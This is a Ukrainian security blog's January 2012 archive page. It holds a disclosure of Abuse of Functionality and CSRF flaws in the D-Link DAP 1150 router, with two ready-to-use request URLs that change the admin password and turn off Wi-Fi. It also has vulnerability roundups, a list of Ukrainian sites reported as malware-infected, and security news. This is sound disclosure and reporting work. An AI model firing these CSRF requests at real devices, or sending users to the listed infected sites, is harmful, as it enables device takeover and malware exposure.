Архів за Січень, 2012

AoF та CSRF уразливості в D-Link DAP 1150

23:56 31.01.2012

10.12.2011

Продовжуючи тему уразливостей в D-Link DAP 1150, розповім вам про нові уразливості в даній точці доступу. У листопаді, 17.11.2011, я виявив Abuse of Functionality та Cross-Site Request Forgery уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router). Це третій advisory з серії записів про уразливості в продуктах D-Link. Попередні були про уразливості в DSL-500T ADSL Router та DAP 1150.

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

31.01.2012

Abuse of Functionality:

Логін адміна є фіксованим (це логін admin), його не можна змінити, тільки пароль. Що полегшує Brute Force атаку.

CSRF:

Весь функціонал адмінки вразливий до CSRF. Ось два приклади.

Зміна пароля адміна:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

В розділі Wi-Fi / Common settings через CSRF можна включити/виключити Wi-Fi, а також змінити MBSSID та BSSID.

Наступний запит відключить Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%20%22mbssidNum%22:1,%20%22mbssidCur%22:1}

Дані уразливості досі не виправлені. D-Link не стала виправляти ці уразливості, так само як вони досі не виправили багато уразливостей в DSL-500T (с 2005 року).

Цікаві записи на тему веб безпеки

22:48 31.01.2012

Продовжуючи традицію, пропоную вашій увазі добірку цікавих записів на тему веб безпеки. Цього разу записи на тему Man-In-The-Middle (MITM) атак. Торік я вже наводив статтю з Вікіпедії, в якій детально розповідається про даний клас атак.

В своєму записі Detecting MITM/Hacking Proxies Via SSL, RSnake розповідає про визначення проксі для MITM атак через SSL.

В своєму записі Places to MITM, RSnake розповідає про місця для MITM атак.

В своєму записі MITM, SSL and Session Fixation, RSnake розповідає про проведення Session Fixation атаки через MITM при використанні SSL у браузері.

Січневий вівторок патчів від Microsoft

20:17 31.01.2012

У січні місяці Microsoft випустила 7 патчів. Що значно менше ніж у грудні.

У січневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 7 бюлетенів по безпеці. Що закривають 8 уразливостей в програмних продуктах компанії. З них один патч закриває дві критичні уразливості, а інші шість патчів - важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7 та 2008 R2. А також Microsoft Office, .NET Framework, Windows Media Player та бібліотеки Microsoft AntiXSS. Також була виправлена уразливість в ОС Windows, що стосується протоколів SSL/TLS, яка використовується для проведення BEAST-атаки.

Добірка уразливостей

17:24 31.01.2012

В даній добірці уразливості в веб додатках:

  • HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution Vulnerability (деталі)
  • Solutiontech (product.php?cat_id) Remote SQL injection Vulnerability (деталі)
  • Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities (деталі)
  • HP OpenView NNM webappmon.exe parameter Remote Code Execution Vulnerability (деталі)
  • Web Fusion Nepal (tour.php?category) XSS Vulnerability (деталі)
  • Avon Groups (search_result.php?cid) Remote SQL injection Vulnerability (деталі)
  • HP OpenView NNM nnmRptConfig.exe nameParams Remote Code Execution Vulnerability (деталі)
  • Web Fusion Nepal (find.php?id) Remote SQL injection Vulnerability (деталі)
  • Infocus Web Solutions (news_desc.php?id) Remote SQL injection Vulnerability (деталі)
  • A1 Solutions (cat_sell.php?cid) Remote SQL injection Vulnerability (деталі)

Багаторівневий захист від malware

23:52 30.01.2012

В презентації Malware Defense-in-Depth 2.0, Aaed Alqarta розповідає про захист від шкідливого коду. Він описує концепіцію багаторівневого захисту від malware, причому її другу версію, призначену протидіяти шкідливому програмному забезпеченню, що розповсюджується у Веб 2.0.

Інфіковані сайти №109

22:45 30.01.2012

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://fashionpeople.com.ua - інфекція була виявлена 03.01.2012. Зараз сайт входить до переліку підозрілих.
  • http://poleznoe-40s.ucoz.ua - інфекція була виявлена 10.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://digitallworld.com.ua - інфекція була виявлена 30.01.2012. Зараз сайт входить до переліку підозрілих.
  • http://ppi.pp.ua - інфекція була виявлена 24.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://x3mal.com.ua - інфекція була виявлена 11.12.2011. Зараз сайт входить до переліку підозрілих.

Міжсайтовий скриптінг у бібліотеці Microsoft AntiXSS

20:16 30.01.2012

Виявлена Cross-Site Scripting уразливість у бібліотеці Microsoft AntiXSS.

Уразливі версії: Microsoft AntiXSS 4.0.

Міжсайтовий скриптінг при парсінгу HTML.

  • Microsoft Anti-XSS Library Bypass (деталі)
  • Microsoft Security Bulletin MS12-007 - Important Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664) (деталі)

Добірка уразливостей

17:28 30.01.2012

В даній добірці уразливості в веб додатках:

  • Dovecot vulnerability (деталі)
  • typo3-src security update (деталі)
  • Mambo CMS 4.6.x (4.6.5) | SQL Injection (деталі)
  • SQL injection vulnerability in colord (деталі)
  • FootBall Cms (view_table_lig.php?group) XSS Vulnerability (деталі)
  • Coherendz (products.php?cat_id) Remote SQL injection Vulnerability (деталі)
  • TrendMicro Control Manager CmdProcessor.exe AddTask Remote Code Execution Vulnerability (деталі)
  • WOC Consulting (search_result.php?cid) Remote SQL injection Vulnerability (деталі)
  • Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability (деталі)
  • Zones Web Solution (StoneDetails.php?stone) XSS Vulnerability (деталі)

Експлоіт для Google Chrome

23:58 28.01.2012

Продовжуючи розпочату традицію, після попереднього відео про BEAST проти HTTPS, пропоную нове відео на веб секюріті тематику. Цього разу відео про експлоіт для Google Chrome. Рекомендую подивитися всім хто цікавиться цією темою.

Hacking [ Windows Vista ] By Private Exploit In Browser Google Chrome

В даному відео ролику демонструється процес використання експлоіта для браузера Google Chrome. Причому це приватний експлоіт. Дана уразливість в Chrome призводить до пошкодження пам’яті в браузері й виконання довільного коду.

Атака відбувається при відвідуванні в Chrome спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Новини: універсальна DoS-атака, Sophos та атака на сайт Європарламенту

22:45 28.01.2012

За повідомленням www.opennet.ru, оприлюднений універсальний спосіб DoS-атаки, що торкається PHP, Java, Ruby, Python і різні веб-платформи.

Наприкінці грудня, на конференції Chaos Communication Congress (28c3) у Берліні був оприлюднений новий спосіб порушення працездатності веб-сервісів, заснований на особливості реалізації структур хешів, що використовуваються для організації збереження наборів даних у представленні ключ/значення, у широкому спектрі мов програмування. Маніпулюючи даними, що використовуються в якості ключів, нападник може затративши мінімальні ресурси ініціювати виникнення передбачуваних колізій в алгоритмі хешування, вирішення яких вимагає додаткових значних процесорних ресурсів.

Доволі цікава уразливість в багатьох мовах програмування, що використовуються при створенні веб додатків. Яку деякі виробники вже почали виправляти, зокрема дана DoS була виправлена в Apache Tomcat та Microsoft .Net.

За повідомленням www.xakep.ru, підсумки року в сфері інтернет-безпеки, за версією Sophos.

Відома своїми рішеннями в області захисту інформації, а також численними уразливостями на власному сайті (які вона так і не виправила), компанія Sophos опублікувала традиційний звіт про самі актуальні загрози минулого року.

У звіті Security Threat Report 2012 відзначається, що поява на ринку популярних хакерських інструментів стало причиною різкого збільшення кількості нового шкідливого ПЗ. В якості основних тенденцій, що вплинули на ріст ринку засобів захисту даних, Sophos називає ріст кількості власників смартфонов і планшетів, що використовуються й у робітників, і в розважальних цілях, а також ріст популярності хмарних сервисів.

За повідомленням lenta.ru, xакери атакували сайт Європарламенту.

Сайт Європарламенту виявився недоступний увечері 26 січня в результаті DDoS-атаки. Атака відбулася через кілька годин після підписання Польщею Торгової угоди по боротьбі з контрафакцією (Anti-Counterfeiting Trade Agreement, ACTA), що посилює міри проти піратських сайтів.

Дану атаку приписують Anonymous. Також раніше повідомлялося, що Anonymous атакували урядові сайты Польщі в знак протесту проти ACTA.